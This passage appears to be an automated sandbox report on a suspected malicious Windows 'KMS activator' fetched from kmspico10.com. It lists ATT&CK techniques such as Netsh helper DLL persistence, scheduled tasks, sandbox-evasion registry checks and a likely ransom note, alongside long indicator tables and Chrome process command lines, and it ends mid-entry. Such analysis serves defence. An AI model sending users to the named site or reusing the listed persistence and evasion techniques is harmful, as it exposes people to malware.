persistence privilege_escalation

Netsh Helper DLL

T1546.007

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe
Key value enumerated	\REGISTRY\MACHINE\SOFTWARE\Microsoft\NetSh	netsh.exe

Permission Groups Discovery: Local Groups 1 TTPs
Attempt to find local system groups and permission settings.
discovery

Local Groups
T1069.001

System Location Discovery: System Language Discovery 1 TTPs 8 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	win.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	winserv.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	RDPWinst.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	GSetup.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	install.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7zaxxx.exe

Checks processor information in registry 2 TTPs 2 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	smss.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	smss.exe

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
1168	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133813456538196388"	chrome.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings	chrome.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\Local Settings	OpenWith.exe
Key created	\REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000_Classes\MIME\Database	smss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Charset	smss.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\MIME\Database\Codepage	smss.exe

NTFS ADS 3 IoCs

description	ioc	Process
File opened for modification	C:\ProgramData\Setup\winmgmts:\	IP.exe
File opened for modification	C:\ProgramData\Setup\WinMgmts:\	IP.exe
File opened for modification	C:\ProgramData\Setup\winmgmts:\	smss.exe

Opens file in notepad (likely ransom note) 1 IoCs

ransomware

pid	Process
3236	NOTEPAD.EXE

Runs net.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 8 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
648	schtasks.exe
5304	schtasks.exe
5592	schtasks.exe
2292	schtasks.exe
1200	schtasks.exe
5932	schtasks.exe
3540	schtasks.exe
5472	schtasks.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
3972	vlc.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3204	chrome.exe
3204	chrome.exe
6108	msedge.exe
6108	msedge.exe
5764	msedge.exe
5764	msedge.exe
5584	chrome.exe
5584	chrome.exe
1744	identity_helper.exe
1744	identity_helper.exe
5584	chrome.exe
5584	chrome.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
5448	KMSTools Lite.exe
244	update.exe
244	update.exe
244	update.exe
244	update.exe
244	update.exe
244	update.exe
244	update.exe
244	update.exe
5552	msedge.exe
5552	msedge.exe
4312	smss.exe
4312	smss.exe
4312	smss.exe
4312	smss.exe
4312	smss.exe
4312	smss.exe
4312	smss.exe
4312	smss.exe
4312	smss.exe
4312	smss.exe

Suspicious behavior: GetForegroundWindowSpam 4 IoCs

pid	Process
3972	vlc.exe
4200	OpenWith.exe
3272	GSetup.exe
2328	unsecapp.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
652	Process not Found

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 41 IoCs

pid	Process
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
5764	msedge.exe
5764	msedge.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe
Token: SeShutdownPrivilege	3204	chrome.exe
Token: SeCreatePagefilePrivilege	3204	chrome.exe

Suspicious use of FindShellTrayWindow 64 IoCs

pid	Process
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe

Suspicious use of SendNotifyMessage 64 IoCs

pid	Process
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3204	chrome.exe
3972	vlc.exe
3972	vlc.exe
3972	vlc.exe
3972	vlc.exe
3972	vlc.exe
3972	vlc.exe
3972	vlc.exe
3972	vlc.exe
3972	vlc.exe
3972	vlc.exe
3972	vlc.exe
3972	vlc.exe
3972	vlc.exe
3972	vlc.exe
5764	msedge.exe
5764	msedge.exe
5764	msedge.exe
5764	msedge.exe
5764	msedge.exe
5764	msedge.exe
5764	msedge.exe
5764	msedge.exe
5764	msedge.exe
5764	msedge.exe
5764	msedge.exe
5764	msedge.exe
5764	msedge.exe
5764	msedge.exe
5764	msedge.exe
5764	msedge.exe
5764	msedge.exe
5764	msedge.exe
5764	msedge.exe
5764	msedge.exe
5764	msedge.exe
5764	msedge.exe
5764	msedge.exe
5764	msedge.exe
3272	GSetup.exe
3272	GSetup.exe

Suspicious use of SetWindowsHookEx 33 IoCs

pid	Process
3972	vlc.exe
4200	OpenWith.exe
4200	OpenWith.exe
4200	OpenWith.exe
4200	OpenWith.exe
4200	OpenWith.exe
4200	OpenWith.exe
4200	OpenWith.exe
4200	OpenWith.exe
4200	OpenWith.exe
4200	OpenWith.exe
4200	OpenWith.exe
5448	KMSTools Lite.exe
3272	GSetup.exe
4804	install.exe
1008	7zaxxx.exe
5992	KMS.exe
244	update.exe
2420	win.exe
432	svchost.exe
2724	IP.exe
4312	smss.exe
5956	winserv.exe
5956	winserv.exe
5956	winserv.exe
5956	winserv.exe
5956	winserv.exe
4604	winserv.exe
4604	winserv.exe
4604	winserv.exe
4604	winserv.exe
5384	RDPWinst.exe
2844	SystemSettingsAdminFlows.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3204 wrote to memory of 3368	3204	chrome.exe	84
PID 3204 wrote to memory of 3368	3204	chrome.exe	84
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4108	3204	chrome.exe	85
PID 3204 wrote to memory of 4264	3204	chrome.exe	86
PID 3204 wrote to memory of 4264	3204	chrome.exe	86
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87
PID 3204 wrote to memory of 4836	3204	chrome.exe	87

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --disable-background-networking --disable-component-update --simulate-outdated-no-au='Tue, 31 Dec 2099 23:59:59 GMT' --single-argument https://kmspico10.com/windows-10-activator/
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:3204
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fff35cecc40,0x7fff35cecc4c,0x7fff35cecc58
  2⤵
  PID:3368
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1868,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1864 /prefetch:2
  2⤵
  PID:4108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2120,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2152 /prefetch:3
  2⤵
  PID:4264
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2228,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2440 /prefetch:8
  2⤵
  PID:4836
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=304,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3144 /prefetch:1
  2⤵
  PID:3508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3108,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3236 /prefetch:1
  2⤵
  PID:2568
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3592,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4612 /prefetch:8
  2⤵
  PID:5108
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4868,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4852 /prefetch:1
  2⤵
  PID:4928
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --field-trial-handle=3272,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4864 /prefetch:1
  2⤵
  PID:3868
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --field-trial-handle=5064,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3372 /prefetch:1
  2⤵
  PID:2508
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --field-trial-handle=3308,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3392 /prefetch:1
  2⤵
  PID:2688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=5360,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3460 /prefetch:1
  2⤵
  PID:1008
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --field-trial-handle=4912,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5520 /prefetch:1
  2⤵
  PID:460
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5528,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5244 /prefetch:1
  2⤵
  PID:3764
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=4948,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5092 /prefetch:1
  2⤵
  PID:2568
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5032,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5160 /prefetch:1
  2⤵
  PID:968
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=5468,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5456 /prefetch:1
  2⤵
  PID:4604
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=5552,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5472 /prefetch:1
  2⤵
  PID:1984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=4620,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5116 /prefetch:1
  2⤵
  PID:4136
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5700,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4416 /prefetch:1
  2⤵
  PID:2840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5580,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5820 /prefetch:1
  2⤵
  PID:1804
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=5628,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5944 /prefetch:1
  2⤵
  PID:2688
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=5972,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5480 /prefetch:1
  2⤵
  PID:3992
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=5488,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5304 /prefetch:1
  2⤵
  PID:1308
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --field-trial-handle=5736,i,15012050445257962395,18222477309042821218,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6204 /prefetch:1
  2⤵
  PID:3208
- C:\Program Files\Google\Chrome\Application\chrome.exe
